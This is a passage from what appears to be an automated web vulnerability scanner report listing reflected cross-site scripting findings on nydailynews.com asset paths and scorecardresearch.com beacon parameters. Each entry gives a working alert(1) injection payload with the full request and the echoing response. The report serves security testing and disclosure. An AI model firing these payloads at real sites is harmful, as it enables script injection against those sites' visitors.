HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:49 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/088a069';alert(1)//a554b3287db/12/alg_charla-nash_surgery.jpg';
}
//-->
...[SNIP]...

1.180. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7529b'%3balert(1)//3afc937eb48 was submitted in the REST URL parameter 4. This input was echoed as 7529b';alert(1)//3afc937eb48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011/08/127529b'%3balert(1)//3afc937eb48/alg_charla-nash_surgery.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:02 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08/127529b';alert(1)//3afc937eb48/alg_charla-nash_surgery.jpg';
}
//-->
...[SNIP]...

1.181. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e346'%3balert(1)//86988af10f8 was submitted in the REST URL parameter 5. This input was echoed as 4e346';alert(1)//86988af10f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011/08/12/alg_charla-nash_surgery.jpg4e346'%3balert(1)//86988af10f8 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:15 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
dn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg4e346';alert(1)//86988af10f8';
}
//-->
...[SNIP]...

1.182. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58f10'%3balert(1)//25181935610 was submitted in the REST URL parameter 1. This input was echoed as 58f10';alert(1)//25181935610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img58f10'%3balert(1)//25181935610/2011/08/12/alg_curtis_granderson.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:13 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img58f10';alert(1)//25181935610/2011/08/12/alg_curtis_granderson.jpg';
}
//-->
...[SNIP]...

1.183. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b47b8'%3balert(1)//83a63c7b35c was submitted in the REST URL parameter 2. This input was echoed as b47b8';alert(1)//83a63c7b35c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011b47b8'%3balert(1)//83a63c7b35c/08/12/alg_curtis_granderson.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:31 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011b47b8';alert(1)//83a63c7b35c/08/12/alg_curtis_granderson.jpg';
}
//-->
...[SNIP]...

1.184. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb460'%3balert(1)//e60c9431fa3 was submitted in the REST URL parameter 3. This input was echoed as bb460';alert(1)//e60c9431fa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011/08bb460'%3balert(1)//e60c9431fa3/12/alg_curtis_granderson.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:44 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08bb460';alert(1)//e60c9431fa3/12/alg_curtis_granderson.jpg';
}
//-->
...[SNIP]...

1.185. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66fcf'%3balert(1)//5350e8a8c99 was submitted in the REST URL parameter 4. This input was echoed as 66fcf';alert(1)//5350e8a8c99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011/08/1266fcf'%3balert(1)//5350e8a8c99/alg_curtis_granderson.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:57 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08/1266fcf';alert(1)//5350e8a8c99/alg_curtis_granderson.jpg';
}
//-->
...[SNIP]...

1.186. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59514'%3balert(1)//684607607d8 was submitted in the REST URL parameter 5. This input was echoed as 59514';alert(1)//684607607d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011/08/12/alg_curtis_granderson.jpg59514'%3balert(1)//684607607d8 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:47:10 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg59514';alert(1)//684607607d8';
}
//-->
...[SNIP]...

1.187. http://assets.nydailynews.com/video/homepage_video.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /video/homepage_video.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b465'%3balert(1)//62add0462bb was submitted in the REST URL parameter 1. This input was echoed as 1b465';alert(1)//62add0462bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video1b465'%3balert(1)//62add0462bb/homepage_video.html HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:35:27 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/video1b465';alert(1)//62add0462bb/homepage_video.html';
}
//-->
...[SNIP]...

1.188. http://assets.nydailynews.com/video/homepage_video.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /video/homepage_video.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 299e0'%3balert(1)//bca7c7ba913 was submitted in the REST URL parameter 2. This input was echoed as 299e0';alert(1)//bca7c7ba913 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/homepage_video.html299e0'%3balert(1)//bca7c7ba913 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:35:38 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69743
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
y.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/video/homepage_video.html299e0';alert(1)//bca7c7ba913';
}
//-->
...[SNIP]...

1.189. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 2cb1d<script>alert(1)</script>45f4ec0d44a was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=82cb1d<script>alert(1)</script>45f4ec0d44a&c2=3005693&c3=1&c4=http%3A%2F%2Fmacnn.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:52:54 GMT
Date: Wed, 28 Sep 2011 02:52:54 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"82cb1d<script>alert(1)</script>45f4ec0d44a", c2:"3005693", c3:"1", c4:"http://macnn.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.190. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 79308<script>alert(1)</script>6e5cfd0a1c8 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fmacnn.com%2F&c5=&c6=&c10=79308<script>alert(1)</script>6e5cfd0a1c8&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:53:01 GMT
Date: Wed, 28 Sep 2011 02:53:01 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://macnn.com/", c5:"", c6:"", c10:"79308<script>alert(1)</script>6e5cfd0a1c8", c15:"", c16:"", r:""});



1.191. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 261ad<script>alert(1)</script>9c83b70164f was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fmacnn.com%2F&c5=&c6=&c10=&c15=261ad<script>alert(1)</script>9c83b70164f HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:53:03 GMT
Date: Wed, 28 Sep 2011 02:53:03 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
-){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://macnn.com/", c5:"", c6:"", c10:"", c15:"261ad<script>alert(1)</script>9c83b70164f", c16:"", r:""});



1.192. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 128f0<script>alert(1)</script>073f8a07027 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693128f0<script>alert(1)</script>073f8a07027&c3=1&c4=http%3A%2F%2Fmacnn.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
